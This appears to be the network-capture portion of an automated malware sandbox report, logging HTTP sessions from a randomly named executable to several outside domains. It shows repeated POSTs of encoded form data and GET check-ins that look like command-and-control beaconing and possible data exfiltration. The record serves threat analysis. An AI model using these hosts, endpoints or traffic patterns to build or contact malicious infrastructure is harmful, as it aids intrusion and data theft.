                                                                  Accept-Language: en-US
                                                                  Host: www.xcvbj.asia
                                                                  Origin: http://www.xcvbj.asia
                                                                  Referer: http://www.xcvbj.asia/rq1s/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 32 2b 46 4d 6b 32 47 67 6c 6d 31 72 57 78 68 2b 44 7a 70 4d 4d 33 43 55 2f 5a 6f 53 32 55 37 6e 77 3d 3d
                                                                  Data Ascii: BTPDLZX=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJ2+FMk2Gglm1rWxh+DzpMM3CU/ZoS2U7nw==
                                                                  Dec 4, 2024 12:50:08.322623968 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:08 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449769149.88.81.190804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:09.499576092 CET765OUTPOST /rq1s/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.xcvbj.asia
                                                                  Origin: http://www.xcvbj.asia
                                                                  Referer: http://www.xcvbj.asia/rq1s/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 54 78 4a 34 51 63 66 31 70 79 38 34 55 44 63 56 79 78 4a 6f 64 58 76 78 46 75 41 59 6d 74 58 4e 59 3d
                                                                  Data Ascii: BTPDLZX=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMTxJ4Qcf1py84UDcVyxJodXvxFuAYmtXNY=
                                                                  Dec 4, 2024 12:50:11.032449961 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:10 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.449775149.88.81.190804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:12.153475046 CET10847OUTPOST /rq1s/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.xcvbj.asia
                                                                  Origin: http://www.xcvbj.asia
                                                                  Referer: http://www.xcvbj.asia/rq1s/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 57 75 6f 30 52 57 31 7a 57 32 49 63 50 6f 4c 5a 4d 76 51 32 51 79 33 4f 30 57 55 56 79 57 63 4b 31 64 6c 77 59 59 55 37 4b 4c 4e 49 54 43 4d 6d 73 79 4d 5a 41 50 78 6f 4a 63 65 6f 71 6d 4b 59 51 2f 6b 65 65 43 4e 6f 32 73 6f 44 46 72 37 64 64 4b 79 2f 58 37 31 77 4b 74 4b 45 6b 2f 57 79 78 34 4f 2f 79 37 46 53 69 74 75 30 35 78 67 68 38 4f 36 7a 41 47 38 64 37 46 2b 58 6a 51 2b 67 6e 6d 57 55 50 71 6e 4f 6e 55 57 71 46 66 35 4a 39 4b 70 73 2f 4f 66 6e 37 63 43 39 6f 51 6a 6e [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3Wuo0RW1zW2IcPoLZMvQ2Qy3O0WUVyWcK1dlwYYU7KLNITCMmsyMZAPxoJceoqmKYQ/keeCNo2soDFr7ddKy/X71wKtKEk/Wyx4O/y7FSitu05xgh8O6zAG8d7F+XjQ+gnmWUPqnOnUWqFf5J9Kps/Ofn7cC9oQjnilFh0dAZwnxfSStEUyy+vkR6NC/4+pFGbgpirpGyACgs6To0/slA6ddulmd3R+vMtLy2phziDZUMm+33Kh0M6oS/eOSz95YBAd9QhliYg72gVNETmuQpcI476yFrpe1swbgYCI+CY1pOXbiVEdGPCu2oerFbjTSaQEvmx9+sArCKG1zU3dY+I18Je1c7dije7ZGBuY+lOk8prsmUC3fvHW+T2+r9e6dEqJeMTn4pw35tkubqcDmk5QwDvPGIzt1Llvpz6HfsuVrsbhjVk6h4hXs6kIJ3zEH9G+k6mDru9NuqHbsiuMT70FGiPVQ+oCCdK+gpy6j4j5KqFAHtmR60M/BMsChMWWOiRvKdKalgooa//kUgpgQ+vDs86XRaaFQCMUUg1JGyNBQulEGA0833SV1n+Y1RobEDSTciuzWco2AxlVbeMhqA2b5g5lhZtHI7+SQ/TFFyuKiBak980vRHa3axIUDPBvyHQWNL8RNPhpMTxf3XfdLEehtZkW/8GXzQX/+fSsQizSphl4Op0CkYUCjcx/KSKGxZa0rikdtCJyZzY4iAOp071TJVbt2v00V7eS6UDa8z7L9bLCiOjo7QsmJwBDMmnvJjnTuMoQt3i6seONKrzxNkY1wn/9eS0fGoiDfnWabZRKVGWAcPB5Z2pnl/I0VT9uEZoR [TRUNCATED]
                                                                  Dec 4, 2024 12:50:13.700366974 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:13 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.449784149.88.81.190804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:14.836179972 CET481OUTGET /rq1s/?WnQdf=JhLPW&BTPDLZX=8hQq9qCyJ4Zif0sZJ+qpsVVSiE3f8un3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1d98q0hIrZL7k5AWWxKgNnUzBpRStLOb73o= HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.xcvbj.asia
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:50:16.311793089 CET289INHTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:16 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: close
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.44980285.159.66.93804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:22.552916050 CET754OUTPOST /rum2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.soainsaat.xyz
                                                                  Origin: http://www.soainsaat.xyz
                                                                  Referer: http://www.soainsaat.xyz/rum2/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 37 67 51 46 31 75 31 4c 72 72 43 79 77 75 6b 77 76 76 70 72 67 7a 75 73 35 2b 69 71 36 56 44 72 51 3d 3d
                                                                  Data Ascii: BTPDLZX=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRo7gQF1u1LrrCywukwvvprgzus5+iq6VDrQ==


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.44980885.159.66.93804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:25.216082096 CET774OUTPOST /rum2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.soainsaat.xyz
                                                                  Origin: http://www.soainsaat.xyz
                                                                  Referer: http://www.soainsaat.xyz/rum2/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 58 64 78 2b 33 57 6e 35 6f 4b 77 56 65 33 55 79 6d 34 68 6e 33 72 7a 46 4a 72 37 41 4d 62 53 41 45 3d
                                                                  Data Ascii: BTPDLZX=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gXdx+3Wn5oKwVe3Uym4hn3rzFJr7AMbSAE=


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.44981685.159.66.93804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:27.880558014 CET10856OUTPOST /rum2/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.soainsaat.xyz
                                                                  Origin: http://www.soainsaat.xyz
                                                                  Referer: http://www.soainsaat.xyz/rum2/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 62 32 34 53 4f 71 78 66 57 70 75 68 50 6c 6d 4a 48 54 67 5a 77 6b 35 6c 47 63 48 67 6d 76 39 33 6a 6c 2f 43 34 75 6f 77 6b 46 52 57 45 64 65 71 74 50 76 6f 4b 68 67 74 73 37 63 41 59 6b 52 2b 54 35 6a 45 46 54 44 6b 52 36 34 68 6a 51 71 4b 7a 6d 56 42 71 53 35 53 55 57 46 2b 58 35 65 71 50 62 59 63 55 45 33 57 54 4d 34 39 44 48 53 69 68 64 54 4e 6a 6a 62 65 34 71 52 79 75 39 49 50 75 48 46 68 35 34 6c 46 2b 32 55 4c 78 75 41 33 74 4b 77 55 41 4b 79 4d 61 62 64 71 31 75 4d 56 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4b24SOqxfWpuhPlmJHTgZwk5lGcHgmv93jl/C4uowkFRWEdeqtPvoKhgts7cAYkR+T5jEFTDkR64hjQqKzmVBqS5SUWF+X5eqPbYcUE3WTM49DHSihdTNjjbe4qRyu9IPuHFh54lF+2ULxuA3tKwUAKyMabdq1uMVsBHE0x/Ps3XqBEqY/NpCvE23+63o15uA2jT8XU6gd/d0O9IM66DjgjmuS78C/ORaxckO1BGqC+t0YpJkVROP9j4szwcoZg+LwbYIy7dASpGwLuVy7hf/4PbCmZPkGtdx4fBsvOMBXsqeaRa8gHb4k8J45btPuEWJ9PJG4ZvFO3W6SoUS2GFgj0HiWOtTDiFk7W0OH+hSRPS/CqMKEBNoSoomT/JwxtoqnHYv3LY6qz5Q695QYImXg+UX7mJbZ/VkRXp+4DVxgwo+z1fjAVnzu26rur/+k6BhBCyD/b+JSjFgBbAC+moc7yYy95/BkEMqKl3UFUFoTvMYweSSSlSkWHkISc9TSj8jRxpN6alvC164qF0CiLdmVZMGz8Z/3Y2+i6psQ8rmRh9ccaeuIe+NBnP55uSlqwQlkANAhPytRfXjoVfoYwpOx2alQJ8tgiLjy28vW3QuiTDWeAk+2qnYRZeQvCWM/WuGfjS5AV07KmL7IohbvGsybYzkwNt1KuI3Z/yTc3QJbdM9EHWvX+BJGNOMY9fms0DF7T3Kh44btKgstJZNHjok+miNkBTm+7vqG9QmRDRA0+6SR802cgVCEs1f8OydRXdV78+/R/z8UayXhpYxh2i+nlRDZBwRlSiZR59aNl12TU7XDt7Iw+yQKVpXIr0MZyUKqJ [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.44982585.159.66.93804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:30.539558887 CET484OUTGET /rum2/?BTPDLZX=xMZmeyR85UPBdQXFJZqJIEL01VnkhEfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBnlxZg+0WQQuds7/7InpDF8b2KXLH9po+SKk=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.soainsaat.xyz
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:50:31.856322050 CET225INHTTP/1.1 404 Not Found
                                                                  Server: nginx/1.14.1
                                                                  Date: Wed, 04 Dec 2024 11:50:31 GMT
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  X-Rate-Limit-Limit: 5s
                                                                  X-Rate-Limit-Remaining: 19
                                                                  X-Rate-Limit-Reset: 2024-12-04T11:50:36.6409840Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  13192.168.2.449841185.27.134.144804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:50:37.639204025 CET748OUTPOST /d9ku/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.amayavp.xyz
                                                                  Origin: http://www.amayavp.xyz
                                                                  Referer: http://www.amayavp.xyz/d9ku/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 74 4b 78 68 59 48 33 4a 68 6f 30 74 33 35 72 4f 38 48 67 6c 4e 47 51 36 4c 67 34 36 43 38 62 70 63 67 3d 3d
                                                                  Data Ascii: BTPDLZX=lCOuZ0pdMNytZWJaHIKfMFBPtGdmxmiuHT1tBv7UXAlcmRoYuCahc3cFQWqrA0J1tPrDNCPaiMQgrNZ4ltNKKcnltpqaBz9M7uSghnUl7IIndMxDEFp0HtQ4DQNpkYzb8KzkkjlLWxSAwqK7lvAFDZElduXm6EBmtKxhYH3Jho0t35rO8HglNGQ6Lg46C8bpcg==
                                                                  Dec 4, 2024 12:50:38.879081964 CET682INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:50:38 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                  Cache-Control: no-cache
                                                                  Content-Encoding: br
